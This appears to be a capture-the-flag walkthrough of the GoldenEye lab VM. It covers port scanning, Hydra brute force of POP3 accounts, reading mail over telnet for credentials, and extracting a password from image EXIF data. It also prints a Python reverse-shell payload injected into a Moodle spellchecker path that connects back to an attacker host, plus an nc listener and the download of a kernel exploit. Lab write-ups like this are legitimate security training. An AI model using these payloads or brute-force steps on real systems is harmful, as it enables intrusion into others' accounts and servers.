GoldenEye Primary Admin Server

########## Nmap Scan: ########## Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-03 19:12 EST Nmap scan report for 10.0.2.14 Host is up (0.00089s latency). Not shown: 65531 closed ports PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 55006/tcp open unknown 55007/tcp open unknown MAC Address: 08:00:27:3B:86:3C (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 6.75 seconds ########## Dirbuster: ########## root@kali:~# dirbuster Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / - 200 File found: /terminal.js - 200 File found: /index.html - 200 Dir found: /icons/ - 403 Dir found: /icons/small/ - 403 'terminal.js' found on the web server: var data = [ { GoldenEyeText: "
Severnaya Auxiliary Control Station
****TOP SECRET ACCESS****
Accessing Server Identity
Server Name:....................
GOLDENEYE

User: UNKNOWN
Naviagate to /sev-home/ to login" } ]; // //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... ////InvincibleHack3r // //BTW Natalya says she can break your codes // var allElements = document.getElementsByClassName("typeing"); for (var j = 0; j < allElements.length; j++) { var currentElementId = allElements[j].id; var currentElementIdContent = data[0][currentElementId]; var element = document.getElementById(currentElementId); var devTypeText = currentElementIdContent; var i = 0, isTag, text; (function type() { text = devTypeText.slice(0, ++i); if (text === devTypeText) return; element.innerHTML = text + ` `; var char = text.slice(-1); if (char === "<") isTag = true; if (char === ">") isTag = false; if (isTag) return type(); setTimeout(type, 60); })(); } [~!~] This is alot of valuable information to work with so we should begin deciphering the file. For an even more full investigation, we will check index.html source as well. 'index.html' found on the web server: GoldenEye Primary Admin Server [~!~] First of all, we notice a comment to Boris, telling them to change their default password. [~!~] Second of all, we can use an HTML Decoder to find out that: InvincibleHack3r Decodes to: InvincibleHack3r ############################ Using our found Credentials: ############################ [~!~] I traveled to 10.0.2.14:80 and found this home page: index.png [~!~] I went to 10.0.2.14:80/sev-home and was greeted with a prompt for Username/Password. Username: boris Password: InvincibleHack3r [~!~] aaaaaaaaaaaaand SUCCESS! We got into sev-home. This greeted us with a webpage playing some movie scene that I didn't recognize and this block of text: sevhome.png [~!~] *Clearly* we hold Top Secret clearance xD I believe the next step must have something to do with the pop3 server they have running, this is probably running on 55006 or 55007. ########################## Accessing the POP3 Service ########################## [~!~] I used telnet to attempt to find which high, non-default port was hosting the POP3 service: root@kali:~/Documents/GoldenEye# telnet 10.0.2.14 55007 Trying 10.0.2.14... Connected to 10.0.2.14. Escape character is '^]'. +OK GoldenEye POP3 Electronic-Mail System [~!~] So we need to find an account that will give us access to their POP3 service. I went with 'boris' since we know that is a probable user. root@kali:~/Documents/GoldenEye# hydra -l boris -P ~/Dictionaries/Login/fasttrack.txt -t20 10.0.2.14 -s55007 -I pop3 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-03 19:29:11 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [DATA] max 20 tasks per 1 server, overall 20 tasks, 222 login tries (l:1/p:222), ~12 tries per task [DATA] attacking pop3://10.0.2.14:55007/ [STATUS] 100.00 tries/min, 100 tries in 00:01h, 122 to do in 00:02h, 20 active [55007][pop3] host: 10.0.2.14 login: boris password: secret1! 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-03 19:31:10 [~!~] Creds for boris were successfully found!!! Let's see what we can find on their email service, perhaps GNO online GoldenEye Operators Training? root@kali:~/Documents/GoldenEye# telnet 10.0.2.14 55007 Trying 10.0.2.14... Connected to 10.0.2.14. Escape character is '^]'. +OK GoldenEye POP3 Electronic-Mail System USER boris +OK PASS secret1! +OK Logged in. LIST +OK 3 messages: 1 544 2 373 3 921 . RETR 1 +OK 544 octets Return-Path: X-Original-To: boris Delivered-To: boris@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id D9E47454B1 for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT) Message-Id: <20180425022326.D9E47454B1@ubuntu> Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT) From: root@127.0.0.1.goldeneye Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here. . RETR 2 +OK 373 octets Return-Path: X-Original-To: boris Delivered-To: boris@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id C3F2B454B1 for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT) Message-Id: <20180425024249.C3F2B454B1@ubuntu> Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT) From: natalya@ubuntu Boris, I can break your codes! . RETR 3 +OK 921 octets Return-Path: X-Original-To: boris Delivered-To: boris@ubuntu Received: from janus (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id 4B9F4454B1 for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT) Message-Id: <20180425025235.4B9F4454B1@ubuntu> Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT) From: alec@janus.boss Boris, Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn! Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages.... PS - Keep security tight or we will be compromised. . [~!~] Ok...that is a lot of information that we stumbled upon. One attack surface we have is the usernames of other users on their pop3 system. NOTE: they don't scan their emails for security risks, yikes. [~!~] Let's try and break into some other users accounts: root@kali:~/Documents/GoldenEye# cat users.txt natalya alec xenia janus admin root root@kali:~/Documents/GoldenEye# hydra -L users.txt -P ~/Dictionaries/Login/fasttrack.txt -t20 10.0.2.14 -s55007 -I pop3 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-03 19:44:51 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [DATA] max 20 tasks per 1 server, overall 20 tasks, 1332 login tries (l:6/p:222), ~67 tries per task [DATA] attacking pop3://10.0.2.14:55007/ [STATUS] 100.00 tries/min, 100 tries in 00:01h, 1232 to do in 00:13h, 20 active [55007][pop3] host: 10.0.2.14 login: natalya password: bird [~!~] More creds found!! Shortly after hydra found natalya it crashed. So I figured I would just look at what I could find on her account. root@kali:~/Documents/GoldenEye# telnet 10.0.2.14 55007 Trying 10.0.2.14... Connected to 10.0.2.14. Escape character is '^]'. +OK GoldenEye POP3 Electronic-Mail System USER natalya +OK PASS bird +OK Logged in. LIST +OK 2 messages: 1 631 2 1048 . RETR 1 +OK 631 octets Return-Path: X-Original-To: natalya Delivered-To: natalya@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id D5EDA454B1 for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT) Message-Id: <20180425024542.D5EDA454B1@ubuntu> Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT) From: root@ubuntu Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you. Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus. . RETR 2 +OK 1048 octets Return-Path: X-Original-To: natalya Delivered-To: natalya@ubuntu Received: from root (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id 17C96454B1 for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT) Message-Id: <20180425031956.17C96454B1@ubuntu> Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT) From: root@ubuntu Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :) Ok, user creds are: username: xenia password: RCP90rulez! Boris verified her as a valid contractor so just create the account ok? And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir **Make sure to edit your host file since you usually work remote off-network.... Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts. . [~!~] A ton more information to go off of. It looks like we need to perform some hosts configuration in order to connect correctly. ############################ Round one site investigation ############################ [~!~] I updated the host file as directed by the email as such: root@kali:~/Documents/GoldenEye# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 10.0.2.6 vtcsec 10.0.2.14 www.severnaya-station.com severnaya-station.com # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters [~!~] Then I visitted the site: gnotrainingsite.png [~!~] Also recall we got some creds in the same email: User: xenia Pass: RCP90rulez! [~!~] I logged into xenia's account on the GNO training site and scoured his account until I found a nice little juicy message: Tuesday, 24 April 2018 09:24 PM: Greetings Xenia, As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here. My email username is... doak Thank you, Cheers, Dr. Doak "The Doctor" Training Scientist - Sr Level Training Operating Supervisor GoldenEye Operations Center Sector Level 14 - NO2 - id:998623-1334 Campus 4, Building 57, Floor -8, Sector 6, cube 1,007 Phone 555-193-826 Cell 555-836-0944 Office 555-846-9811 Personal 555-826-9923 Email: doak@ Please Recycle before you print, Stay Green aka save the company money! "There's such a thing as Good Grief. Just ask Charlie Brown" - someguy "You miss 100% of the shots you don't shoot at" - Wayne G. THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS. [~!~] OH BOY, another email we can try and break into... root@kali:~/Documents/GoldenEye# hydra -l doak -P ~/Dictionaries/Login/fasttrack.txt -t20 10.0.2.14 -s55007 -I pop3 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-03 20:22:29 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 20 tasks per 1 server, overall 20 tasks, 222 login tries (l:1/p:222), ~12 tries per task [DATA] attacking pop3://10.0.2.14:55007/ [STATUS] 100.00 tries/min, 100 tries in 00:01h, 122 to do in 00:02h, 20 active [55007][pop3] host: 10.0.2.14 login: doak password: goat 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-03 20:24:14 [~!~] These passwords ARE SO WEAK :O Let's see what Dr. Doak's email has in store for us. root@kali:~/Documents/GoldenEye# telnet 10.0.2.14 55007 Trying 10.0.2.14... Connected to 10.0.2.14. Escape character is '^]'. +OK GoldenEye POP3 Electronic-Mail System USER doak +OK PASS goat +OK Logged in. LIST +OK 1 messages: 1 606 . RETR 1 +OK 606 octets Return-Path: X-Original-To: doak Delivered-To: doak@ubuntu Received: from doak (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id 97DC24549D for ; Tue, 30 Apr 1995 20:47:24 -0700 (PDT) Message-Id: <20180425034731.97DC24549D@ubuntu> Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT) From: doak@ubuntu James, If you're reading this, congrats you've gotten this far. You know how tradecraft works right? Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information...... username: dr_doak password: 4England! . [~!~] Woot woot, more creds in this never-ending journey of creds. Now we'll see what's on his account... ######################### Deciphering a secret file ######################### secretfile.png [~!~] Welp, that looks important! Let's read this very top secret message. I downloaded it to my local machine to read it. root@kali:~/Documents/GoldenEye# cat s3cret.txt 007, I was able to capture this apps adm1n cr3ds through clear txt. Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. Something juicy is located here: /dir007key/for-007.jpg Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play. [~!~] OOOooooOOOOooo a message to agent 007 himself! It looks like we have found a path to some image: /dir007key/for-007.jpg root@kali:~/Documents/GoldenEye# wget http://severnaya-station.com/dir007key/for-007.jpg --2018-12-03 20:35:06-- http://severnaya-station.com/dir007key/for-007.jpg Resolving severnaya-station.com (severnaya-station.com)... 10.0.2.14 Connecting to severnaya-station.com (severnaya-station.com)|10.0.2.14|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 14896 (15K) [image/jpeg] Saving to: ‘for-007.jpg’ for-007.jpg 100%[====================================================================================>] 14.55K --.-KB/s in 0s 2018-12-03 20:35:06 (223 MB/s) - ‘for-007.jpg’ saved [14896/14896] [~!~] Here is the image: for-007.jpg [~!~] Looks like picture from the old Goldeneye game, we'll use exiftool to attempt to find some hidden information in the image. root@kali:~/Documents/GoldenEye# exiftool for-007.jpg ExifTool Version Number : 11.16 File Name : for-007.jpg Directory : . File Size : 15 kB File Modification Date/Time : 2018:04:24 20:40:02-04:00 File Access Date/Time : 2018:12:03 20:35:06-05:00 File Inode Change Date/Time : 2018:12:03 20:35:06-05:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 X Resolution : 300 Y Resolution : 300 Exif Byte Order : Big-endian (Motorola, MM) Image Description : eFdpbnRlcjE5OTV4IQ== Make : GoldenEye Resolution Unit : inches Software : linux Artist : For James Y Cb Cr Positioning : Centered Exif Version : 0231 Components Configuration : Y, Cb, Cr, - User Comment : For 007 Flashpix Version : 0100 Image Width : 313 Image Height : 212 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1) Image Size : 313x212 Megapixels : 0.066 [~!~] There's some base64 -> eFdpbnRlcjE5OTV4IQ== Decoding that yields -> xWinter1995x! [~!~] Referring back to the original s3cret.txt, this is most likely an admin password. We will attempt to get into the admin account. ########### The Exploit ########### [~!~] This took me FOREVER to get to work, and it was for a rather frustrating reason. After researching moodle exploits, I discovered a vulnerability in the spell- checker path function (which can be editted freely by site admins, which we are at this point). [~!~] By injecting this payload into the spellchecker path: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' [~!~] And then creating a blog post, then invoking the spell- checker function, we can successfully throw ourselves a reverse shell! Neat! root@kali:~/Documents/GoldenEye# nc -lnvp 443 listening on [any] 443 ... connect to [10.0.2.4] from (UNKNOWN) [10.0.2.14] 52741 /bin/sh: 0: can't access tty; job control turned off $ whoami www-data [~!~] The reason I was stuck on this for so long was because the spellcheck version was set to Google Spell, which I assume has some sort of blocking mechanism of sorts. I FINALLY found this setting after about 30 minutes and set it to PSpell, and BOOM, like magic it immediately worked! ################### Rooting the Machine ################### [~!~] The final step to any box is getting root. Due to time constraints to finish this box, I had to get a little help (Credit @ https://medium.com/egghunter/). He pointed me towards an Ubuntu 14.04 exploit named overlayfs. The exploit: https://www.exploit-db.com/exploits/37292 [~!~] I hosted the editted code on my server so that I could easily transfer it to the GoldenEye box. NOTE: this method is extremely noisy and would NEVER be advisable during actual pen-testing. ] 5,041 --.-K/s in 0.04s 2018-12-03 21:16:08 (126 KB/s) - 'overlayfs.c' saved [5041/5041]